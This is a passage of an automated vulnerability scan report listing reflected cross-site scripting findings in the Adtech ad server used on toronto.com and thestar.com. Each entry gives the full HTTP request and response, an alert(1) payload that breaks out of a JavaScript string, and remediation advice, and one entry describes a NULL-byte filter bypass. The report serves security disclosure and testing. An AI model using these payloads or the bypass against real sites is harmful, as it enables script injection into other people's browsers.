Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2504

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
//adserver.adtechus.com/adlink/5214/1245417/0/2687/AdId=1146623;BnId=1;itime=210253322;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=bc1aa"-alert(1)-"896ed7c58c4http://www.torontozoo.com/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.89. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245417/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005cd82"-alert(1)-"1a904358a8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cd82"-alert(1)-"1a904358a8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/1245417/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_1;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886472;aduho=-360;rdclick=&%005cd82"-alert(1)-"1a904358a8b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2516

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
server.adtechus.com/adlink/5214/1245417/0/2687/AdId=1146623;BnId=1;itime=369021792;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%005cd82"-alert(1)-"1a904358a8b=1http://www.torontozoo.com/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.90. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245417/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9d7a"-alert(1)-"b0263e8b42f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245417/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_1;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886472;aduho=-360;rdclick=&f9d7a"-alert(1)-"b0263e8b42f=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2510

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
/adserver.adtechus.com/adlink/5214/1245417/0/2687/AdId=1146623;BnId=1;itime=210254094;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&f9d7a"-alert(1)-"b0263e8b42f=1http://www.torontozoo.com/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.91. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245418/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5caa'-alert(1)-'07d861fff7 was submitted at the end of the semicolon-delimited path segment, as the value of rdclick= (the scanner reports this as the loc parameter because it parses the whole segment loc=100;target=...;rdclick=... as one parameter named loc). This input was echoed unmodified in the application's response as the start of the href value inside a single-quoted JavaScript string passed to document.write(); the unescaped ' closes the literal and -alert(1)- is evaluated as code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245418/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_3;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886693;aduho=-360;rdclick=c5caa'-alert(1)-'07d861fff7 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 379

document.write('<a href="c5caa'-alert(1)-'07d861fff7http://adserver.adtechus.com/?adlink/5214/1245418/0/2687/AdId=-3;BnId=0;itime=210254131;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank>
...[SNIP]...

2.92. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245418/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 236ac'-alert(1)-'55c5a44263a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245418/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_3;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886693;aduho=-360;rdclick=&236ac'-alert(1)-'55c5a44263a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 383

document.write('<a href="&236ac'-alert(1)-'55c5a44263a=1http://adserver.adtechus.com/?adlink/5214/1245418/0/2687/AdId=-3;BnId=0;itime=210255076;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank
...[SNIP]...

2.93. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906356/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cecd"-alert(1)-"459c117a26d was submitted at the end of the semicolon-delimited path segment, as the value of rdclick= (reported by the scanner as the loc parameter, since it treats the whole segment loc=100;...;rdclick=... as one parameter). This input was echoed unmodified in the application's response as the link= value of the click URL inside the double-quoted string that document.write() uses to build a <SCRIPT SRC=...> tag; the unescaped " closes the literal and -alert(1)- is evaluated as code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906356/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_300x250_1;size=300x250;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207901129;aduho=-360;rdclick=2cecd"-alert(1)-"459c117a26d HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 507

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=300x250&section=786976&pub_redirect_unencoded=1&pub_redirect=htt
...[SNIP]...
ver.adtechus.com/adlink/5214/1135723/0/170/AdId=607818;BnId=2;itime=210260810;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=2cecd"-alert(1)-"459c117a26d\">
...[SNIP]...

2.94. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906356/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78846"-alert(1)-"8ee53af4a84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906356/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_300x250_1;size=300x250;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207889496;aduho=-360;rdclick=&78846"-alert(1)-"8ee53af4a84=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 501

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=300x250&section=786976&pub_redirect_unencoded=1&pub_redirect=htt
...[SNIP]...
://adserver.adtechus.com/adlink/5214/1135723/0/170/AdId=607818;BnId=2;itime=210264769;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&78846"-alert(1)-"8ee53af4a84=1\">
...[SNIP]...

2.95. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bb7a'-alert(1)-'fda509b19b0 was submitted at the end of the semicolon-delimited path segment, as the value of rdclick= (reported by the scanner as the loc parameter, since it treats the whole segment loc=100;...;rdclick=... as one parameter). This input was echoed unmodified in the application's response as the link= value inside the single-quoted string passed to escape() when AT_COUNT is built; the unescaped ' closes the literal and -alert(1)- is evaluated as code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response is JavaScript (Content-Type: application/x-javascript) requested from the www.thestar.com search results page named in the Referer; loaded through a <script src> tag, it executes in that publisher page's origin.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=4bb7a'-alert(1)-'fda509b19b0 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.4.DD494.51.0.4CE93806.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:26 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19023

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ashClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('906388'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=4;itime=352645191;nodecode=yes;link=4bb7a'-alert(1)-'fda509b19b0')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906388+"'))";
AT_TARGET906388="_self";
}
window.AT_ClickFn906388= function (click)
{    click=(isNaN(
...[SNIP]...

2.96. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b664"-alert(1)-"676d698933f was submitted at the end of the semicolon-delimited path segment, as the value of rdclick= (reported by the scanner as the loc parameter, since it treats the whole segment loc=100;...;rdclick=... as one parameter). This input was echoed unmodified in the application's response as the link= value inside the double-quoted string passed to escape() when AT_MULTICLICKSTR is built; the unescaped " closes the literal and -alert(1)- is evaluated as code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=4b664"-alert(1)-"676d698933f HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.4.DD494.51.0.4CE93801.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:21 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19023

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=4;itime=352640837;nodecode=yes;link=4b664"-alert(1)-"676d698933f") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.97. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dc27'-alert(1)-'ae52f954438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=&6dc27'-alert(1)-'ae52f954438=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.6.DD494.51.0.4CE9380D.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:33 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19057

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
shClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('906388'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=6;itime=352652558;nodecode=yes;link=&6dc27'-alert(1)-'ae52f954438=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906388+"'))";
AT_TARGET906388="_self";
}
window.AT_ClickFn906388= function (click)
{    click=(isNa
...[SNIP]...

2.98. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74b62"-alert(1)-"160f91b1af0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=&74b62"-alert(1)-"160f91b1af0=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.A.DD494.51.0.4CE9380A.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:30 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19065

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=10;itime=352649524;nodecode=yes;link=&74b62"-alert(1)-"160f91b1af0=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.99. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31f3a'-alert(1)-'eea6890dad0 was submitted at the end of the semicolon-delimited path segment, as the value of rdclick= (reported by the scanner as the loc parameter, since it treats the whole segment loc=100;...;rdclick=... as one parameter). This input was echoed unmodified in the application's response as the link= value inside the single-quoted string passed to escape() when AT_COUNT is built; the unescaped ' closes the literal and -alert(1)- is evaluated as code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=31f3a'-alert(1)-'eea6890dad0 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.3.DD495.52.0.4CE93804.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:24 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19028

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ashClick || AT_MICROSITE!="")
{    AT_COUNT=''
